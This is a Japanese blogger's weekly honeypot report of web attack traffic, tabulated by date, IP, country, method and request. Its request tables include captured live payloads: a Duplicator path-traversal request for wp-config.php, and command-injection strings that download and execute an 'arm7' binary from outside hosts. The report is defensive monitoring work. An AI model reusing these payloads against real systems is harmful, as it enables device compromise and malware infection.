サイバーセキュリティ&人工知能研究所
サイバーセキュリティや人工知能(機械学習等)を中心に、最新技術を研究しています。
週刊ハニーポット(2020/04/20号)
2020/04/12-2020/04/18
私が運営するハニーポット(WOWHoneypot)の週刊アクセス情報です。
[注意]週に10回以上の同種同一アクセスを降順に集計しています。
・日別アクセス数
| 日付 | 回数 |
|---|---|
| 2020-04-12 | 450 |
| 2020-04-13 | 423 |
| 2020-04-14 | 638 |
| 2020-04-15 | 488 |
| 2020-04-16 | 405 |
| 2020-04-17 | 783 |
| 2020-04-18 | 664 |
・IP アドレス別アクセス回数
| IP アドレス(国別コード) | 回数 |
|---|---|
| 193.106.30.99 (UA) | 718 |
| 216.245.221.83 (US) | 175 |
| 163.172.146.119 (GB) | 85 |
| 62.210.88.239 (FR) | 84 |
| 163.172.190.160 (GB) | 71 |
| 62.210.201.108 (FR) | 63 |
| 148.217.94.54 (MX) | 54 |
| 51.158.165.18 (FR) | 38 |
| 45.146.253.35 (DE) | 37 |
| 163.172.189.32 (GB) | 36 |
| 192.41.19.53 (US) | 32 |
| 209.251.53.192 (US) | 28 |
| 180.250.12.19 (ID) | 23 |
| 45.64.134.198 (BD) | 20 |
| 210.245.110.254 (VN) | 19 |
| 51.158.186.242 (FR) | 18 |
| 51.158.180.179 (FR) | 18 |
| 189.57.62.146 (BR) | 18 |
| 198.211.117.96 (US) | 18 |
| 5.101.0.209 (RU) | 18 |
| 152.26.66.77 (US) | 17 |
| 82.119.170.106 (DE) | 17 |
| 132.145.89.166 (KR) | 16 |
| 82.200.233.4 (KZ) | 14 |
| 45.76.33.175 (NL) | 13 |
| 40.65.233.127 (US) | 12 |
| 104.248.29.200 (DE) | 12 |
| 97.74.236.9 (US) | 12 |
| 142.4.22.236 (US) | 12 |
| 192.99.149.195 (CA) | 12 |
| 51.77.223.62 (FR) | 12 |
| 192.41.71.199 (US) | 11 |
| 52.140.242.103 (JP) | 11 |
| 171.67.70.85 (US) | 11 |
| 217.116.134.29 (RU) | 10 |
| 62.210.140.4 (FR) | 10 |
・国別アクセス回数
| 国名(国別コード) | 回数 |
|---|---|
| United States (US) | 1169 |
| Ukraine (UA) | 730 |
| France (FR) | 432 |
| United Kingdom (GB) | 272 |
| Germany (DE) | 169 |
| Singapore (SG) | 166 |
| China (CN) | 106 |
| Canada (CA) | 86 |
| India (IN) | 79 |
| Indonesia (ID) | 73 |
| Mexico (MX) | 69 |
| Russia (RU) | 62 |
| Netherlands (NL) | 57 |
| Vietnam (VN) | 48 |
| Brazil (BR) | 37 |
| Bangladesh (BD) | 29 |
| South Korea (KR) | 26 |
| Japan (JP) | 23 |
| Italy (IT) | 20 |
| Hong Kong (HK) | 16 |
| Kazakhstan (KZ) | 14 |
| Turkey (TR) | 13 |
| Romania (RO) | 12 |
| Sweden (SE) | 12 |
| Iran (IR) | 10 |
・メソッド別アクセス回数
| メソッド | 回数 |
|---|---|
| GET | 1308 |
| POST | 2365 |
| HEAD | 174 |
| PROPFIND | 0 |
| CONNECT | 2 |
| OPTIONS | 2 |
・リクエスト別アクセス回数(GET)
| リクエスト | 回数 |
|---|---|
| GET /wp-login.php | 527 |
| GET /robots.txt | 36 |
| GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php | 20 |
| GET /phpMyAdmin/scripts/setup.php | 18 |
| GET /ads.txt | 14 |
・リクエスト別アクセス回数(POST)
| リクエスト | 回数 |
|---|---|
| POST /wp-login.php | 523 |
| POST /xmlrpc.php | 522 |
| POST /conflict.accept.php | 21 |
| POST /requests.suspect.php | 20 |
| POST /code.conflicts.php | 19 |
| POST /content.process.php | 19 |
| POST /less.img.php | 19 |
| POST /accepted.lock.php | 19 |
| POST /img.multi.php | 19 |
| POST /created.gateway.php | 19 |
| POST /content.conflicts.php | 19 |
| POST /library.admin.php | 19 |
| POST /tmp.data.php | 19 |
| POST /less.reset.php | 19 |
| POST /types.library.php | 19 |
| POST /database.tmp.php | 19 |
| POST /exception.accept.php | 19 |
| POST /gateway.png.php | 19 |
| POST /link.internal.php | 19 |
| POST /storage.processor.php | 19 |
| POST /request.admin.php | 19 |
| POST /process.created.php | 19 |
| POST /cache.store.php | 19 |
| POST /media.modes.php | 19 |
| POST /include.bad.php | 19 |
| POST /content.using.php | 19 |
| POST /load.log.php | 19 |
| POST /img.http.php | 19 |
| POST /cookie.archive.php | 19 |
| POST /session.content.php | 19 |
| POST /sys.link.php | 19 |
| POST /database.jpeg.php | 19 |
| POST /media.css.php | 19 |
| POST /jpeg.png.php | 19 |
| POST /database.exceptions.php | 19 |
| POST /type.sessions.php | 19 |
| POST /admin.conflicts.php | 19 |
| POST /config.sys.php | 19 |
| POST /multi.http.php | 19 |
| POST /method.xml.php | 19 |
| POST /post.content.php | 19 |
| POST /cache.jpeg.php | 19 |
| POST /db.body.php | 19 |
| POST /library.clients.php | 18 |
| POST /load.jpg.php | 18 |
| POST /throw.types.php | 18 |
| POST /archive.db.php | 18 |
| POST /cache.bad.php | 18 |
| POST /work.modes.php | 18 |
| POST /system.gone.php | 18 |
| POST /wp-content/plugins/temp.php | 18 |
| POST /process.htaccess.php | 18 |
| POST /throw.xmlrpc.php | 17 |
| POST /init.using.php | 17 |
| POST /except.exceptions.php | 17 |
| POST /success.class.php | 17 |
| POST /css.accepted.php | 17 |
| POST /png.jpg.php | 17 |
| POST /modes.json.php | 17 |
| POST /jpeg.using.php | 17 |
| POST /suspected.processor.php | 16 |
| POST /data.image.php | 16 |
| POST /client.config.php | 15 |
| POST /internal.clients.php | 15 |
| POST /accepted.exceptions.php | 15 |
| POST /cookie.sess.php | 15 |
| POST /cgi-bin/mainfunction.cgi | 14 |
| POST /media.processor.php | 14 |
| POST /system.processor.php | 13 |
| POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 11 |
| POST /phpMyAdmin/scripts/setup.php | 11 |
| POST /success.init.php | 10 |
| POST /json.accepted.php | 10 |
| POST /success.include.php | 10 |
| POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 10 |
・HTTP バージョン別アクセス回数
| HTTP バージョン | 回数 |
|---|---|
| HTTP/1.1 | 3797 |
| HTTP/1.0 | 54 |
(全 3851 アクセス)
記述に際しては、細心の注意をしたつもりですが、間違いやご指摘がありましたら、こちらからお知らせいただけると幸いです。
↓ Now Translating...
↑ Now Translating...↓ Now Reading...
↑ Now Reading... ↓ Recommending...
↑ Recommending...